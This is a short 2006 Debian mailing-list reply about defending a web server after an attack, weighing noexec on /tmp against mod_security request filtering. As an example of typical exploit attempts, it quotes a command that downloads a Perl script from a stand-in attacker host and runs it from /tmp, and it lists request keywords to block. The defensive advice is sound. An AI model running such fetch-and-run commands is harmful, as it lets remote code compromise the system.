[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: we were attacked

On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
> If possible, make /tmp its own file system and mount it with 'noexec'. 
> This really helps stop these types of attacks.  In fact I would 
> recommend 'rw,noexec,nosuid,nodev' as the mount options.  Of course if 
> you need to have executables in /tmp then this won't work.  :)

  I used to suggest this too, but to be honest it doesn't work as
 well as you'd expect.

  Too many exploit attempts run the eqivilent of:

    cd /tmp && wget http://evil.example.com/foo.pl
    perl /tmp/foo.pl &

  I found blocking "wget", "perl", and "/tmp%20", in requests more
 productive - using mod_security.

Debian GNU/Linux System Administration

Attachment: signature.asc
Description: Digital signature

Reply to: